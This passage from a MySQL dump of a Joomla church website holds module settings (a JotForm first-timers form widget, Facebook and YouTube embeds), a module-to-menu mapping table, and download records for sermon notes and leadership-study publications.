(426, 356, 'First Timer Form', '', '<script src=\"https://form.myjotform.com/static/feedback2.js?3.3.REV\" type=\"text/javascript\">\r\n      new JotformFeedback({\r\n        formId: \"52455229473560\",\r\n        buttonText: \"FIRST TIMERS FORM (Dream Centre Online Church)\",\r\n        base: \"https://form.myjotform.com/\",\r\n        background: \"#F59202\",\r\n        fontColor: \"#FFFFFF\",\r\n        buttonSide: \"bottom\",\r\n        buttonAlign: \"right\",\r\n        type: false,\r\n        width: 700,\r\n        height: 500\r\n      });\r\n    </script>', 10, 'sidebar-b', 196, '2018-07-13 05:40:37', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(428, 361, 'streaming', '', '', 1, 'sidebar-b', 196, '2018-07-13 05:40:06', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"bottommenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(429, 365, 'Facebook Live Message', '', '', 1, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', -2, 'mod_facebook_live_message', 1, 0, '{\"facebook_name\":\"Facebook\",\"facebook_url\":\"https:\\/\\/www.facebook.com\\/dclivestreaming\",\"width\":\"500\",\"height\":\"300\",\"face\":\"true\",\"show_header\":\"true\",\"hide\":\"true\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(430, 366, 'Chat', '', '<p>{jumi[*9]}</p>', 1, 'sidebar-b', 196, '2018-07-13 05:40:40', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(431, 368, 'Module - Facebook Comments By Internet Partner', '', '', 1, 'innerbottom-a', 0, '0000-00-00 00:00:00', '2017-03-19 14:16:22', '0000-00-00 00:00:00', 1, 'mod_wsfbcom', 1, 0, '{\"data-num-posts\":\"5\",\"data-width\":\"800\",\"data-colorscheme\":\"\",\"appId\":\"208294829652452\",\"adminID\":\"100003069351462\",\"lang\":\"\",\"blockedIPs\":\"\",\"altMessage\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(432, 388, 'Sj Newsletter Popup', '', '', 1, 'mega-menu', 0, '0000-00-00 00:00:00', '2018-07-21 18:36:19', '0000-00-00 00:00:00', 0, 'mod_sj_newsletter_popup', 1, 1, '{\"expired\":\"1\",\"width\":\"100%\",\"image_bg_display\":\"0\",\"imageurl\":\"\",\"color_bg\":\"#721305\",\"title_display\":\"1\",\"title\":\"NEWSLETTER\",\"newsletter_promo\":\"Thank you for visiting our website.\",\"moduleclass_sfx\":\"\",\"layout\":\"_:default\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(433, 392, 'Convert Forms', '', '', 0, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_convertforms', 1, 1, '', 0, '*'),
(434, 393, 'Vina YouTube Channel', '', '', 1, 'top-a', 0, '0000-00-00 00:00:00', '2018-09-03 13:16:02', '0000-00-00 00:00:00', 1, 'mod_vina_youtube_channel', 1, 0, '{\"channelUrl\":\"https:\\/\\/www.youtube.com\\/user\\/lifeoasischurch\",\"playList\":\"\",\"searchTab\":\"0\",\"searchTabName\":\"Search-Joomla 3.4\",\"searchChannel\":\"\",\"relatedTo\":\"\",\"searchQuery\":\"joomla 3.4\",\"searchOrder\":\"date\",\"autoPlayVideo\":\"0\",\"autoLoadComments\":\"0\",\"commentOrder\":\"relevance\",\"displayVideo\":\"popup\",\"alwaysUseDropdown\":\"0\",\"skin\":\"grey\",\"maxResults\":\"15\",\"innerOffset\":\"40\",\"outerOffset\":\"35\",\"minItemWidth\":\"250\",\"maxItemWidth\":\"400\",\"maxContainerWidth\":\"1000\",\"moduleclass_sfx\":\"\",\"layout\":\"_:default\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_modules_menu`
--

CREATE TABLE `y57u5_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_modules_menu`
--

INSERT INTO `y57u5_modules_menu` (`moduleid`, `menuid`) VALUES
(2, 0),
(3, 0),
(4, 0),
(6, 0),
(7, 0),
(8, 0),
(9, 0),
(10, 0),
(12, 0),
(13, 0),
(14, 0),
(15, 0),
(17, 103),
(17, 622),
(17, 623),
(17, 624),
(17, 625),
(17, 626),
(17, 766),
(17, 767),
(17, 768),
(17, 769),
(17, 770),
(19, 103),
(20, 103),
(21, 103),
(22, 103),
(27, 103),
(28, 103),
(29, 103),
(30, 103),
(32, 0),
(34, 103),
(35, 103),
(38, 0),
(39, 0),
(40, 0),
(41, 102),
(41, 123),
(42, 103),
(42, 108),
(42, 109),
(42, 111),
(42, 112),
(42, 113),
(42, 114),
(42, 115),
(42, 116),
(42, 117),
(42, 118),
(42, 119),
(42, 120),
(42, 121),
(42, 122),
(42, 123),
(42, 211),
(43, 103),
(43, 211),
(44, 103),
(44, 211),
(49, 0),
(50, 101),
(50, 248),
(62, 103),
(62, 211),
(63, 103),
(63, 211),
(64, 103),
(64, 211),
(65, 103),
(65, 211),
(71, 103),
(72, 103),
(73, 103),
(74, 103),
(80, 0),
(81, 0),
(95, 103),
(96, 103),
(97, 103),
(98, 103),
(103, 164),
(103, 165),
(104, 164),
(104, 165),
(105, 163),
(105, 165),
(105, 174),
(105, 195),
(105, 197),
(105, 199),
(105, 213),
(105, 266),
(105, 434),
(105, 435),
(105, 772),
(105, 773),
(105, 778),
(106, 163),
(106, 165),
(129, 101),
(129, 235),
(130, 101),
(130, 235),
(131, 101),
(131, 235),
(136, 103),
(167, 211),
(168, 211),
(172, 106),
(172, 269),
(173, 106),
(175, 185),
(175, 234),
(175, 235),
(175, 248),
(175, 249),
(206, 101),
(206, 248),
(213, 103),
(213, 211),
(214, 103),
(214, 211),
(216, 213),
(218, 213),
(220, 213),
(221, 213),
(226, 213),
(226, 410),
(234, -103),
(248, 0),
(261, 0),
(265, -211),
(265, -103),
(267, 106),
(268, 101),
(268, 106),
(268, 162),
(268, 164),
(268, 174),
(268, 195),
(268, 196),
(268, 197),
(268, 434),
(268, 991),
(268, 993),
(268, 999),
(268, 1073),
(268, 1074),
(268, 1075),
(268, 1082),
(268, 1098),
(269, 106),
(269, 269),
(271, 0),
(272, 284),
(297, 361),
(309, 211),
(313, 0),
(314, 101),
(315, 235),
(319, 406),
(322, 410),
(328, 211),
(329, 211),
(330, 211),
(337, 103),
(337, 211),
(338, 103),
(338, 211),
(339, 103),
(339, 211),
(340, 103),
(340, 211),
(341, 103),
(341, 211),
(342, 103),
(342, 211),
(343, 211),
(344, 103),
(346, -103),
(347, 101),
(347, 248),
(348, 101),
(348, 410),
(349, 101),
(349, 248),
(352, 162),
(352, 163),
(352, 164),
(352, 165),
(352, 253),
(354, 107),
(354, 126),
(354, 127),
(354, 128),
(354, 129),
(354, 130),
(354, 151),
(354, 152),
(354, 155),
(354, 208),
(355, 306),
(355, 321),
(355, 322),
(355, 438),
(355, 458),
(356, 204),
(356, 205),
(356, 207),
(356, 210),
(356, 251),
(357, 158),
(357, 218),
(357, 219),
(357, 220),
(357, 221),
(357, 224),
(357, 225),
(357, 227),
(357, 229),
(357, 406),
(358, 437),
(359, 132),
(359, 174),
(359, 195),
(359, 197),
(359, 199),
(359, 434),
(359, 435),
(359, 991),
(359, 993),
(360, 102),
(360, 103),
(360, 104),
(360, 196),
(360, 213),
(360, 303),
(360, 771),
(360, 772),
(360, 773),
(360, 778),
(360, 998),
(360, 999),
(360, 1000),
(360, 1001),
(360, 1058),
(360, 1073),
(363, 174),
(363, 195),
(363, 196),
(363, 197),
(363, 199),
(363, 213),
(363, 434),
(363, 435),
(363, 772),
(363, 773),
(363, 778),
(363, 991),
(363, 993),
(364, 410),
(365, 101),
(365, 410),
(376, -103),
(382, 0),
(383, 0),
(385, 622),
(385, 623),
(385, 624),
(385, 625),
(385, 626),
(385, 766),
(385, 767),
(385, 768),
(385, 769),
(385, 770),
(385, 774),
(385, 775),
(386, 622),
(386, 623),
(386, 624),
(386, 625),
(386, 626),
(386, 766),
(386, 767),
(386, 768),
(386, 769),
(386, 770),
(386, 774),
(386, 775),
(387, 622),
(387, 623),
(387, 624),
(387, 625),
(387, 626),
(387, 766),
(387, 767),
(387, 768),
(387, 769),
(387, 770),
(387, 774),
(387, 775),
(388, 622),
(388, 623),
(388, 624),
(388, 625),
(388, 626),
(388, 766),
(388, 767),
(388, 768),
(388, 769),
(388, 770),
(388, 774),
(388, 775),
(389, 622),
(389, 623),
(389, 624),
(389, 625),
(389, 626),
(389, 766),
(389, 767),
(389, 768),
(389, 769),
(389, 770),
(389, 774),
(389, 775),
(391, 103),
(393, 362),
(393, 363),
(393, 364),
(393, 365),
(393, 366),
(393, 367),
(393, 368),
(393, 369),
(393, 370),
(395, 434),
(399, 101),
(400, 0),
(401, 0),
(402, 0),
(403, 107),
(403, 127),
(403, 128),
(403, 158),
(404, 0),
(405, 0),
(406, 103),
(406, 211),
(407, 103),
(408, 103),
(410, 103),
(411, 103),
(412, 991),
(413, 0),
(415, 101),
(415, 103),
(415, 106),
(415, 112),
(415, 113),
(415, 114),
(415, 115),
(415, 116),
(415, 118),
(415, 119),
(415, 120),
(415, 122),
(415, 123),
(415, 162),
(415, 164),
(415, 174),
(415, 195),
(415, 197),
(415, 199),
(415, 213),
(415, 235),
(415, 303),
(415, 410),
(415, 420),
(415, 421),
(415, 422),
(415, 423),
(415, 424),
(415, 425),
(415, 426),
(415, 427),
(415, 428),
(415, 429),
(415, 430),
(415, 431),
(415, 434),
(415, 435),
(415, 459),
(415, 622),
(415, 623),
(415, 624),
(415, 625),
(415, 626),
(415, 766),
(415, 767),
(415, 768),
(415, 769),
(415, 770),
(415, 771),
(415, 772),
(415, 773),
(415, 774),
(415, 775),
(415, 778),
(415, 991),
(415, 993),
(415, 1073),
(415, 1125),
(416, -1125),
(416, -1120),
(416, -1106),
(416, -1104),
(416, -1102),
(416, -1101),
(416, -1099),
(416, -1095),
(416, -1082),
(416, -1075),
(416, -1074),
(416, -1073),
(416, -999),
(416, -997),
(416, -996),
(416, -995),
(416, -993),
(416, -991),
(416, -778),
(416, -775),
(416, -774),
(416, -773),
(416, -772),
(416, -771),
(416, -770),
(416, -769),
(416, -768),
(416, -767),
(416, -766),
(416, -626),
(416, -625),
(416, -624),
(416, -623),
(416, -622),
(416, -459),
(416, -435),
(416, -434),
(416, -431),
(416, -430),
(416, -429),
(416, -428),
(416, -427),
(416, -426),
(416, -425),
(416, -424),
(416, -423),
(416, -422),
(416, -421),
(416, -420),
(416, -410),
(416, -303),
(416, -235),
(416, -213),
(416, -199),
(416, -197),
(416, -196),
(416, -195),
(416, -174),
(416, -164),
(416, -162),
(416, -123),
(416, -122),
(416, -120),
(416, -119),
(416, -118),
(416, -116),
(416, -115),
(416, -114),
(416, -113),
(416, -112),
(416, -106),
(416, -104),
(416, -103),
(416, -101),
(421, 104),
(421, 1095),
(422, 101),
(422, 410),
(423, 0),
(424, 0),
(425, 106),
(426, 2),
(426, 3),
(426, 4),
(426, 5),
(426, 6),
(426, 7),
(426, 8),
(426, 9),
(426, 10),
(426, 11),
(426, 13),
(426, 14),
(426, 15),
(426, 16),
(426, 17),
(426, 21),
(426, 101),
(426, 102),
(426, 103),
(426, 104),
(426, 106),
(426, 108),
(426, 109),
(426, 111),
(426, 112),
(426, 113),
(426, 114),
(426, 115),
(426, 116),
(426, 117),
(426, 118),
(426, 119),
(426, 120),
(426, 121),
(426, 122),
(426, 123),
(426, 132),
(426, 162),
(426, 164),
(426, 174),
(426, 195),
(426, 196),
(426, 197),
(426, 199),
(426, 213),
(426, 235),
(426, 248),
(426, 253),
(426, 266),
(426, 303),
(426, 324),
(426, 410),
(426, 420),
(426, 421),
(426, 422),
(426, 423),
(426, 424),
(426, 425),
(426, 426),
(426, 427),
(426, 428),
(426, 429),
(426, 430),
(426, 431),
(426, 434),
(426, 435),
(426, 442),
(426, 443),
(426, 444),
(426, 445),
(426, 446),
(426, 447),
(426, 448),
(426, 459),
(426, 622),
(426, 623),
(426, 624),
(426, 625),
(426, 626),
(426, 629),
(426, 630),
(426, 631),
(426, 632),
(426, 633),
(426, 634),
(426, 635),
(426, 636),
(426, 637),
(426, 639),
(426, 640),
(426, 751),
(426, 752),
(426, 753),
(426, 754),
(426, 755),
(426, 756),
(426, 757),
(426, 758),
(426, 759),
(426, 760),
(426, 761),
(426, 762),
(426, 763),
(426, 764),
(426, 765),
(426, 766),
(426, 767),
(426, 768),
(426, 769),
(426, 770),
(426, 771),
(426, 772),
(426, 773),
(426, 774),
(426, 775),
(426, 776),
(426, 778),
(426, 991),
(426, 993),
(426, 995),
(426, 996),
(426, 997),
(426, 998),
(426, 999),
(426, 1000),
(426, 1001),
(426, 1073),
(426, 1074),
(426, 1075),
(426, 1076),
(426, 1077),
(426, 1078),
(426, 1079),
(426, 1080),
(426, 1081),
(426, 1082),
(426, 1083),
(426, 1084),
(426, 1085),
(426, 1086),
(426, 1087),
(427, 0),
(429, 996),
(429, 1095),
(430, 995),
(431, 109),
(431, 622),
(431, 623),
(432, 0),
(434, 1000);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_newsfeeds`
--

CREATE TABLE `y57u5_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `link` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `cache_time` int(10) UNSIGNED NOT NULL DEFAULT '3600',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  `access` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `images` text COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_overrider`
--

CREATE TABLE `y57u5_overrider` (
  `id` int(10) NOT NULL COMMENT 'Primary Key',
  `constant` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `string` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `file` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload`
--

CREATE TABLE `y57u5_phocadownload` (
  `id` int(11) UNSIGNED NOT NULL,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sectionid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `owner_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(250) NOT NULL DEFAULT '',
  `filename_play` varchar(250) NOT NULL DEFAULT '',
  `filename_preview` varchar(250) NOT NULL DEFAULT '',
  `filesize` int(11) NOT NULL DEFAULT '0',
  `author` varchar(255) NOT NULL DEFAULT '',
  `author_email` varchar(255) NOT NULL DEFAULT '',
  `author_url` varchar(255) NOT NULL DEFAULT '',
  `license` varchar(255) NOT NULL DEFAULT '',
  `license_url` varchar(255) NOT NULL DEFAULT '',
  `image_filename` varchar(255) NOT NULL DEFAULT '',
  `image_filename_spec1` varchar(255) NOT NULL DEFAULT '',
  `image_filename_spec2` varchar(255) NOT NULL DEFAULT '',
  `image_download` varchar(255) NOT NULL DEFAULT '',
  `video_filename` varchar(255) NOT NULL DEFAULT '',
  `link_external` varchar(255) NOT NULL DEFAULT '',
  `mirror1link` varchar(255) NOT NULL DEFAULT '',
  `mirror1title` varchar(255) NOT NULL DEFAULT '',
  `mirror1target` varchar(10) NOT NULL DEFAULT '',
  `mirror2link` varchar(255) NOT NULL DEFAULT '',
  `mirror2title` varchar(255) NOT NULL DEFAULT '',
  `mirror2target` varchar(10) NOT NULL DEFAULT '',
  `description` text,
  `features` text,
  `changelog` text,
  `notes` text,
  `userid` int(11) NOT NULL DEFAULT '0',
  `version` varchar(255) NOT NULL DEFAULT '',
  `directlink` tinyint(1) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `textonly` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `confirm_license` int(11) NOT NULL DEFAULT '0',
  `unaccessible_file` int(11) NOT NULL DEFAULT '0',
  `token` char(64) DEFAULT NULL,
  `tokenhits` int(11) NOT NULL DEFAULT '0',
  `tags_string` varchar(255) NOT NULL DEFAULT '',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_phocadownload`
--

INSERT INTO `y57u5_phocadownload` (`id`, `catid`, `sectionid`, `sid`, `owner_id`, `title`, `alias`, `filename`, `filename_play`, `filename_preview`, `filesize`, `author`, `author_email`, `author_url`, `license`, `license_url`, `image_filename`, `image_filename_spec1`, `image_filename_spec2`, `image_download`, `video_filename`, `link_external`, `mirror1link`, `mirror1title`, `mirror1target`, `mirror2link`, `mirror2title`, `mirror2target`, `description`, `features`, `changelog`, `notes`, `userid`, `version`, `directlink`, `date`, `publish_up`, `publish_down`, `hits`, `textonly`, `published`, `approved`, `checked_out`, `checked_out_time`, `ordering`, `access`, `confirm_license`, `unaccessible_file`, `token`, `tokenhits`, `tags_string`, `params`, `metakey`, `metadesc`, `metadata`, `language`) VALUES
(1, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (30th October, 2016)', 'kingdom-leadership-studies-publication-30th-october-2016', 'KLS 30TH OCTOBER 2016.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', NULL, NULL, NULL, NULL, 0, '', 0, '2016-12-21 12:18:06', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 743, 0, 1, 1, 0, '0000-00-00 00:00:00', 1, 1, 0, 0, '1f880a451e9db0850be15929cd07b004ae8bac803ebfe765e15d931a7f202448', 0, '', NULL, NULL, NULL, NULL, '*'),
(2, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (20th November, 2016)', 'kingdom-leadership-studies-publication-20th-november-2016', 'kls 20th nov 2016.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2016-12-21 12:19:18', '2017-01-22 14:58:01', '0000-00-00 00:00:00', 338, 0, 1, 1, 0, '0000-00-00 00:00:00', 2, 1, 0, 0, '17a3ffcb940eae6f645384e5f3685d3ddb47c236893727dbdb0653467dcb8d93', 0, '', NULL, '', '', NULL, '*'),
(3, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (27th November, 2016)', 'kingdom-leadership-studies-publication-27th-november-2016', 'kls 27th NOVEMBER 2016.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', NULL, NULL, NULL, NULL, 0, '', 0, '2016-12-21 12:19:39', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 354, 0, 1, 1, 0, '0000-00-00 00:00:00', 3, 1, 0, 0, '6cb24453340516dde38baf31b02fca143b6d9ba8b728240b306c4f8600c191de', 0, '', NULL, NULL, NULL, NULL, '*'),
(4, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (6th November, 2016)', 'kingdom-leadership-studies-publication-6th-november-2016', 'kls 6th november 2016.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', NULL, NULL, NULL, NULL, 0, '', 0, '2016-12-21 12:20:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 433, 0, 1, 1, 0, '0000-00-00 00:00:00', 4, 1, 0, 0, '4212093d1a9c41a4988273e7ee1d78ba135b244a484cce61c5e7879711829308', 0, '', NULL, NULL, NULL, NULL, '*'),
(5, 1, 0, 0, 0, 'Passion for the Lost', 'passion-for-the-lost', 'passion-lost.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2016-12-31 22:10:45', '2016-12-31 22:10:45', '0000-00-00 00:00:00', 2763, 0, 1, 1, 0, '0000-00-00 00:00:00', 5, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(6, 1, 0, 0, 0, 'Your New Life', 'your-new-life', 'new-life.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2016-12-31 22:44:59', '2016-12-31 22:44:59', '0000-00-00 00:00:00', 3487, 0, 1, 1, 0, '0000-00-00 00:00:00', 6, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(7, 1, 0, 0, 0, 'Victory Celebration Service (01/01/2017)', 'victory-celebration-service-01-01-2017', 'VCS 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-01 10:32:18', '2017-01-01 10:32:18', '0000-00-00 00:00:00', 1012, 0, 1, 1, 0, '0000-00-00 00:00:00', 7, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(8, 1, 0, 0, 0, 'Annual Faith Seminar 2017 Pamphlet', 'annual-faith-seminar-2017-pamphlet', 'AFS 2017 PAMPHLEt.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-01 10:46:02', '2017-01-01 10:46:02', '0000-00-00 00:00:00', 994, 0, 1, 1, 196, '2017-12-28 12:48:53', 8, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(9, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication (8th January, 2017)', 'kingdom-leadership-studies-publication-8th-january-2017', 'kls 8th january 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-07 22:35:45', '2017-01-07 22:35:45', '0000-00-00 00:00:00', 472, 0, 1, 1, 0, '0000-00-00 00:00:00', 9, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(10, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication (15th January, 2017)', 'kingdom-leadership-studies-publication-15th-january-2017', 'KLS 15TH JANUARY 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-15 06:09:37', '2017-01-15 06:09:37', '0000-00-00 00:00:00', 451, 0, 1, 1, 0, '0000-00-00 00:00:00', 10, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(11, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (22nd January, 2017)', 'kingdom-leadership-studies-publication-22nd-january-2017', 'kls 22nd January 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-22 15:09:23', '2017-01-22 15:09:23', '0000-00-00 00:00:00', 532, 0, 1, 1, 0, '0000-00-00 00:00:00', 11, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(12, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (29th January, 2017)', 'kingdom-leadership-studies-publication-29th-november-2016', 'KLS 29TH JANUARY 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-01-31 18:50:53', '2017-01-31 18:50:53', '0000-00-00 00:00:00', 799, 0, 1, 1, 0, '0000-00-00 00:00:00', 12, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(13, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (26th March, 2017)', 'kingdom-leadership-studies-publication-19th-february-2017', 'KLS 19TH FEB 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-02-19 19:21:23', '2017-02-19 19:21:23', '0000-00-00 00:00:00', 446, 0, 1, 1, 0, '0000-00-00 00:00:00', 13, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(14, 2, 0, 0, 0, 'Sermon Notes (20th February, 2017)', 'sermon-notes-20-02-2017', 'sermon note.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-02-20 12:45:07', '2017-02-20 12:45:07', '0000-00-00 00:00:00', 349, 0, 1, 1, 0, '0000-00-00 00:00:00', 1, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(15, 2, 0, 0, 0, 'LBA Sermon Notes (22nd February, 2017)', 'lba', 'LBA-22-02-17.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 1, '2017-02-23 11:19:17', '2017-02-23 11:19:17', '0000-00-00 00:00:00', 117, 0, 1, 1, 0, '0000-00-00 00:00:00', 2, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(16, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (26th February, 2017)', 'kingdom-leadership-studies-publication-26th-february-2017', 'KLS 26TH FEB. 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-02-26 17:57:46', '2017-02-26 17:57:46', '0000-00-00 00:00:00', 340, 0, 1, 1, 0, '0000-00-00 00:00:00', 14, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
